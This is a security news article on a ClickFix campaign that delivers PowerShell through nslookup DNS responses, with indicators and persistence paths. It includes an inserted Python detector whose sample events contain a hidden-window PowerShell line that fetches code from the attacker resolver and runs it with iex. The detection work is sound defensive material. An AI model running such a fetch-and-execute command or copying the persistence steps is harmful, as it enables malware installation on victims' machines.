ClickFix Exploit Uses Nslookup to Deliver PowerShell Payload via DNS

Threat actors are increasingly utilizing DNS queries in ClickFix attacks to deliver malware. This represents a novel method in social engineering campaigns aimed at deceiving users into executing harmful commands.

Understanding ClickFix Exploit and Its Impact

ClickFix attacks typically lure users into running commands that appear to fix errors, install updates, or enhance functionality. The latest iteration employs a technique in which an attacker-controlled DNS server delivers the second-stage payload in its response to a DNS lookup.

Mechanism of the Attack

In a recent ClickFix campaign reported by Microsoft, unsuspecting victims are directed to use the nslookup command to query a malicious DNS server rather than their system’s default server. This command triggers a DNS lookup for a specific hostname that subsequently returns a malicious PowerShell script.

  • Command used: nslookup
  • Attacker-controlled DNS server: 84[.]21.189[.]20
  • Payload delivery mechanism: DNS response containing PowerShell script

This PowerShell script executes on the victim’s device, leading to malware installation. Reports indicate that the second-stage script downloads further malicious tools, including a ZIP archive containing Python runtime executables designed for reconnaissance on infected devices.

Establishing Persistence

To maintain access, the attack creates files in the user's profile, such as:

  • %APPDATA%\WPy64-31401\python\script.vbs
  • %STARTUP%\MonitoringService.lnk

These entries enable the malware to execute on system startup, with the final payload identified as ModeloRAT, a remote access trojan granting attackers control over compromised systems.
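Detection logic for the two observable stages of this chain (the nslookup call against an attacker-supplied resolver, and the persistence artefacts under %APPDATA% and the Startup folder), written as an added example that is not part of the article or of Microsoft's report. It runs over constructed Sysmon-style events; the event field names, the approved-resolver list, the host names and the sample command lines are assumptions, and the only value taken from the article is the resolver address.

```python
import re
from typing import Iterable, Optional

# Resolver the article attributes to the campaign (de-fanged there as 84[.]21.189[.]20).
KNOWN_BAD_RESOLVERS = {"84.21.189.20"}
# Resolvers this organisation expects its hosts to use: assumed values.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

# nslookup's non-interactive form is `nslookup [-opt ...] host [server]`; the optional
# second positional argument is an explicit server that overrides the system resolver,
# which is exactly the behaviour the lure relies on.
NSLOOKUP_RE = re.compile(
    r"\bnslookup(?:\.exe)?\s+(?:-\S+\s+)*"
    r"(?P<host>[^\s;|)\"']+)(?:\s+(?P<server>[^\s;|)\"']+))?",
    re.IGNORECASE,
)
INVOKE_EXPR_RE = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE)
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)
APPDATA_SCRIPT_RE = re.compile(r"\\AppData\\Roaming\\.*\.(?:vbs|ps1|js|bat)$", re.IGNORECASE)


def nslookup_server(cmdline: str) -> Optional[str]:
    """Return the explicit server operand of an nslookup call found anywhere in a
    command line (it may be nested inside `powershell -c "..."`), or None."""
    m = NSLOOKUP_RE.search(cmdline)
    return m.group("server") if m else None


def process_findings(ev: dict) -> list:
    """Findings for one process-creation event (Sysmon Event ID 1 shape assumed)."""
    reasons = []
    cmd = ev.get("cmdline", "")
    image = ev.get("image", "").lower()
    parent = ev.get("parent_image", "").lower()
    server = nslookup_server(cmd)
    if server is not None:
        if server in KNOWN_BAD_RESOLVERS:
            reasons.append(f"nslookup against known ClickFix resolver {server}")
        elif server not in APPROVED_RESOLVERS:
            reasons.append(f"nslookup against non-approved resolver {server}")
    if NSLOOKUP_RE.search(cmd) and INVOKE_EXPR_RE.search(cmd):
        reasons.append("nslookup output fed to Invoke-Expression in one command line")
    if image.endswith("powershell.exe") and parent.endswith("explorer.exe"):
        reasons.append("PowerShell launched from Explorer (Run-dialog pattern used by ClickFix lures)")
    return reasons


def file_findings(ev: dict) -> list:
    """Findings for one file-creation event (Sysmon Event ID 11 shape assumed)."""
    path = ev.get("path", "")
    reasons = []
    if STARTUP_LNK_RE.search(path):
        reasons.append("shortcut dropped in the per-user Startup folder")
    if APPDATA_SCRIPT_RE.search(path):
        reasons.append("script file dropped under %APPDATA%")
    return reasons


def scan(events: Iterable[dict]) -> list:
    """Return one finding per suspicious event with a host-level severity: 'high' when
    the same host shows both a DNS-delivery signal and a persistence artefact (the full
    chain described in the article), otherwise 'medium'."""
    findings, hosts = [], {}
    for ev in events:
        reasons = process_findings(ev) if ev["type"] == "process" else file_findings(ev)
        if not reasons:
            continue
        findings.append({"host": ev["host"], "event_id": ev["id"], "reasons": reasons})
        if ev["type"] == "file":
            kind = "persistence"
        elif any("nslookup" in r for r in reasons):
            kind = "delivery"
        else:
            kind = "context"  # explorer -> powershell alone is only weak evidence
        hosts.setdefault(ev["host"], set()).add(kind)
    for f in findings:
        f["severity"] = "high" if {"delivery", "persistence"} <= hosts[f["host"]] else "medium"
    return findings


# Constructed sample telemetry for this example; not real events from any incident.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-17", "type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "$r=(nslookup -q=txt upd.example.invalid 84.21.189.20); iex $r"'},
    {"id": 2, "host": "WS-17", "type": "file",
     "path": r"C:\Users\alice\AppData\Roaming\WPy64-31401\python\script.vbs"},
    {"id": 3, "host": "WS-17", "type": "file",
     "path": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MonitoringService.lnk"},
    {"id": 4, "host": "WS-22", "type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\nslookup.exe", "cmdline": "nslookup -type=mx example.com 10.0.0.53"},
    {"id": 5, "host": "WS-22", "type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\nslookup.exe", "cmdline": "nslookup www.example.com"},
    {"id": 6, "host": "WS-31", "type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\nslookup.exe", "cmdline": "nslookup host.example.com 8.8.8.8"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The explicit-server check is the discriminating signal: ordinary troubleshooting rarely names a resolver, and when it does it is one the organisation already knows, so the approved list keeps the rule quiet on administrators while the known-bad set catches the campaign's own infrastructure. The file checks are deliberately generic (any script under %APPDATA%, any new shortcut in Startup) so they do not depend on the folder names this one campaign happened to use.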

Evolution of ClickFix Attacks

Over the past year, ClickFix attacks have shown significant evolution. Threat actors have adapted their delivery tactics and payload types to target various operating systems. Early ClickFix campaigns often required users to execute commands directly on their systems. However, recent tactics have expanded to include more sophisticated methods.

New Techniques and Challenges

One notable recent campaign, dubbed “ConsentFix,” exploited the Azure CLI OAuth app to compromise Microsoft accounts without requiring passwords, successfully bypassing multi-factor authentication (MFA). Additionally, threat actors are leveraging popular AI platforms to distribute misleading guides related to ClickFix attacks.

New reports also highlight an innovative approach where attackers promoted a ClickFix exploit through Pastebin comments. This tactic tricked cryptocurrency users into executing malicious JavaScript in their browsers, affecting transaction operations at cryptocurrency exchanges.

This represents a significant shift, as it illustrates the ability of attackers to execute JavaScript directly in browsers, focusing on web application functionality rather than purely deploying malware.

As cyber threats continue to evolve, vigilance and updated security practices are essential for users and organizations to navigate these challenges effectively.